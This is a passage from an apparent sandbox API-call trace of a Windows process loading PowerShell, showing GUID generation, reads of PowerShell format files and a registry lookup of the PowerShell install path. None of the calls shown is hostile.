	[0798.045] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x96d6a149, Data2=0x9f1c, Data3=0x4b7d, Data4=([0]=0xaa, [1]=0x72, [2]=0x18, [3]=0x82, [4]=0x5e, [5]=0xbb, [6]=0xc1, [7]=0xab))) returned 0x0
	[0798.046] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x146d15d6, Data2=0x8434, Data3=0x4ca9, Data4=([0]=0x9a, [1]=0x91, [2]=0xc5, [3]=0x8e, [4]=0x71, [5]=0xd4, [6]=0x32, [7]=0xed))) returned 0x0
	[0798.046] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x9f05d361, Data2=0xe1b4, Data3=0x4d7d, Data4=([0]=0x9e, [1]=0x76, [2]=0x27, [3]=0x47, [4]=0x30, [5]=0x2c, [6]=0xce, [7]=0xd1))) returned 0x0
	[0798.046] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xe1e89c47, Data2=0x70a0, Data3=0x43b3, Data4=([0]=0xb8, [1]=0xe3, [2]=0xca, [3]=0x0, [4]=0x47, [5]=0x4b, [6]=0x2d, [7]=0x15))) returned 0x0
	[0798.046] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xc746b892, Data2=0xe700, Data3=0x4556, Data4=([0]=0xb6, [1]=0x18, [2]=0xd6, [3]=0x3d, [4]=0xf7, [5]=0x35, [6]=0x9a, [7]=0xa4))) returned 0x0
	[0798.046] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xaa29a877, Data2=0x99e2, Data3=0x4f29, Data4=([0]=0xb0, [1]=0xea, [2]=0x2c, [3]=0xed, [4]=0xda, [5]=0x25, [6]=0x42, [7]=0xdd))) returned 0x0
	[0798.046] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd63ef232, Data2=0xdd89, Data3=0x4101, Data4=([0]=0x8c, [1]=0xd2, [2]=0xa2, [3]=0x84, [4]=0xc9, [5]=0xc0, [6]=0x64, [7]=0x4b))) returned 0x0
	[0798.047] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x34600fb0, Data2=0xc309, Data3=0x42ca, Data4=([0]=0xaa, [1]=0xc4, [2]=0xe, [3]=0x3c, [4]=0x82, [5]=0xc8, [6]=0xef, [7]=0x2d))) returned 0x0
	[0798.047] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd772c02f, Data2=0x7ea9, Data3=0x4d76, Data4=([0]=0x8c, [1]=0x97, [2]=0xc4, [3]=0x1e, [4]=0x27, [5]=0x18, [6]=0x18, [7]=0x7b))) returned 0x0
	[0798.047] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xbc0097c1, Data2=0xcbef, Data3=0x4511, Data4=([0]=0x8f, [1]=0xb4, [2]=0xbc, [3]=0xd4, [4]=0x67, [5]=0x93, [6]=0x32, [7]=0x0))) returned 0x0
	[0798.047] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf9c8bb3f, Data2=0x2362, Data3=0x41f1, Data4=([0]=0x9f, [1]=0xb1, [2]=0x1b, [3]=0x68, [4]=0x1f, [5]=0x62, [6]=0x3c, [7]=0x3))) returned 0x0
	[0798.047] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd487e297, Data2=0xde11, Data3=0x4c90, Data4=([0]=0xa9, [1]=0x55, [2]=0xd0, [3]=0x61, [4]=0xb5, [5]=0xa1, [6]=0xb3, [7]=0xd7))) returned 0x0
	[0798.048] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xaf980c16, Data2=0x80e4, Data3=0x41b2, Data4=([0]=0x8d, [1]=0x0, [2]=0xb4, [3]=0xed, [4]=0xe2, [5]=0x9b, [6]=0xdf, [7]=0xab))) returned 0x0
	[0798.048] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x81000e5f, Data2=0x9f77, Data3=0x40d1, Data4=([0]=0x88, [1]=0xa8, [2]=0xbf, [3]=0xfa, [4]=0xb2, [5]=0xb0, [6]=0x6c, [7]=0x41))) returned 0x0
	[0798.048] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xeb7814d9, Data2=0xb359, Data3=0x46c1, Data4=([0]=0x9c, [1]=0x5, [2]=0xb1, [3]=0x17, [4]=0xcb, [5]=0xb9, [6]=0xfd, [7]=0x67))) returned 0x0
	[0798.048] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf4b99447, Data2=0xf3fd, Data3=0x40d4, Data4=([0]=0xa9, [1]=0x87, [2]=0x8c, [3]=0xa0, [4]=0xf6, [5]=0x2d, [6]=0x17, [7]=0xe9))) returned 0x0
	[0798.048] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf03f7b4c, Data2=0xe796, Data3=0x4369, Data4=([0]=0xb5, [1]=0x81, [2]=0xca, [3]=0xc, [4]=0xcd, [5]=0x8f, [6]=0x59, [7]=0x32))) returned 0x0
	[0798.048] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xa67fd08c, Data2=0xdef2, Data3=0x45cf, Data4=([0]=0xaf, [1]=0x45, [2]=0x28, [3]=0xe6, [4]=0x37, [5]=0x47, [6]=0x3d, [7]=0x4))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x5ca046e0, Data2=0x8f9, Data3=0x406f, Data4=([0]=0xac, [1]=0x5e, [2]=0xad, [3]=0x56, [4]=0x59, [5]=0x42, [6]=0x9b, [7]=0xbc))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x4fa775d2, Data2=0xc95a, Data3=0x4daf, Data4=([0]=0x96, [1]=0xf3, [2]=0x70, [3]=0xe5, [4]=0xa4, [5]=0x1a, [6]=0xd4, [7]=0xd3))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x3d6956ab, Data2=0xef5f, Data3=0x4a58, Data4=([0]=0xbc, [1]=0x35, [2]=0xb2, [3]=0x81, [4]=0x28, [5]=0x12, [6]=0x3d, [7]=0x97))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xb54e287a, Data2=0xeb5a, Data3=0x4c8a, Data4=([0]=0xb2, [1]=0x48, [2]=0xc, [3]=0xd9, [4]=0xea, [5]=0x16, [6]=0x7f, [7]=0xa4))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x1bfa4fec, Data2=0xfa9, Data3=0x4117, Data4=([0]=0x8a, [1]=0x92, [2]=0x55, [3]=0x74, [4]=0x65, [5]=0xc2, [6]=0x24, [7]=0x8e))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x7994e077, Data2=0x87c7, Data3=0x40be, Data4=([0]=0x97, [1]=0xa, [2]=0x3a, [3]=0xa7, [4]=0xc2, [5]=0x94, [6]=0xea, [7]=0x8b))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x46c41434, Data2=0x3f1e, Data3=0x4a32, Data4=([0]=0xbe, [1]=0x4, [2]=0x7a, [3]=0x7f, [4]=0x79, [5]=0x44, [6]=0x56, [7]=0xfc))) returned 0x0
	[0798.049] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x31251de4, Data2=0xd165, Data3=0x4b2f, Data4=([0]=0xa9, [1]=0x79, [2]=0xd4, [3]=0x30, [4]=0x27, [5]=0xfb, [6]=0x6d, [7]=0x6))) returned 0x0
	[0798.050] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x4ec81222, Data2=0x40b9, Data3=0x453b, Data4=([0]=0x97, [1]=0x47, [2]=0x3e, [3]=0x7b, [4]=0x17, [5]=0x3a, [6]=0xb7, [7]=0xc4))) returned 0x0
	[0798.050] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x1d51c95e, Data2=0xb277, Data3=0x4901, Data4=([0]=0x96, [1]=0x2e, [2]=0xad, [3]=0xad, [4]=0x8a, [5]=0x33, [6]=0x5, [7]=0x63))) returned 0x0
	[0798.050] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x3273d367, Data2=0xbc1f, Data3=0x48ec, Data4=([0]=0x9c, [1]=0x7e, [2]=0x45, [3]=0xd5, [4]=0x8d, [5]=0x5e, [6]=0xc5, [7]=0xbb))) returned 0x0
	[0798.050] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x13813cc4, Data2=0x4e74, Data3=0x4c99, Data4=([0]=0x91, [1]=0xd9, [2]=0x72, [3]=0xc8, [4]=0xe6, [5]=0x1c, [6]=0x71, [7]=0xf5))) returned 0x0
	[0798.050] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x91d794c2, Data2=0xec3c, Data3=0x45b1, Data4=([0]=0x9a, [1]=0x58, [2]=0x17, [3]=0xbf, [4]=0xb8, [5]=0x32, [6]=0xe3, [7]=0x94))) returned 0x0
	[0798.051] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x41074dec, Data2=0x36d6, Data3=0x495d, Data4=([0]=0xa3, [1]=0xb5, [2]=0xdc, [3]=0x5a, [4]=0xad, [5]=0x8e, [6]=0x7, [7]=0x9))) returned 0x0
	[0798.051] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0798.051] GetFileType (hFile=0x2f4) returned 0x1
	[0798.051] SetErrorMode (uMode=0x1) returned 0x1
	[0798.051] GetFileType (hFile=0x2f4) returned 0x1
	[0798.051] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.098] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x119, lpOverlapped=0x0) returned 1
	[0799.099] ReadFile (in: hFile=0x2f4, lpBuffer=0x347a940, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347a940*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0799.100] CloseHandle (hObject=0x2f4) returned 1
	[0799.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0799.100] SetErrorMode (uMode=0x1) returned 0x1
	[0799.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0799.100] SetErrorMode (uMode=0x1) returned 0x1
	[0799.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0799.101] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2f4) returned 0x0
	[0799.101] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0799.101] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a1c0
	[0799.101] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a1c0, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0799.101] CoTaskMemFree (pv=0x1ba3a1c0) 
	[0799.101] RegCloseKey (hKey=0x2f4) returned 0x0
	[0799.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0799.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0799.102] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x9ee09f7, Data2=0x2a8b, Data3=0x4208, Data4=([0]=0xbe, [1]=0xda, [2]=0x93, [3]=0x20, [4]=0x8f, [5]=0xed, [6]=0xc0, [7]=0xd3))) returned 0x0
	[0799.102] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x1075bf48, Data2=0x86cf, Data3=0x435b, Data4=([0]=0xa1, [1]=0x42, [2]=0xb3, [3]=0xd, [4]=0x23, [5]=0x56, [6]=0x91, [7]=0x9b))) returned 0x0
	[0799.103] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x6a65af1, Data2=0x85b0, Data3=0x4341, Data4=([0]=0x88, [1]=0xd2, [2]=0x2, [3]=0xdd, [4]=0x1b, [5]=0xf5, [6]=0xaf, [7]=0x4b))) returned 0x0
	[0799.103] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xd215a065, Data2=0x6de, Data3=0x43ee, Data4=([0]=0x85, [1]=0x92, [2]=0xcb, [3]=0x37, [4]=0xd0, [5]=0x3a, [6]=0x18, [7]=0xc7))) returned 0x0
	[0799.103] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0799.103] GetFileType (hFile=0x2f4) returned 0x1
	[0799.103] SetErrorMode (uMode=0x1) returned 0x1
	[0799.103] GetFileType (hFile=0x2f4) returned 0x1
	[0799.103] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.104] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.105] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.105] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.107] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.107] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.107] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.107] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.109] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.110] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.110] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.110] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.111] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.111] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.112] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.112] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.128] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.130] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.131] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.131] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.132] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.132] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.132] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.133] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.133] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.134] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.134] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.134] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.135] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.135] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.135] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0799.136] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.023] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.024] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.024] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.025] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.025] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.025] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0800.026] ReadFile (in: hFile=0x2f4, lpBuffer=0x34d6ae0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x34d6ae0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
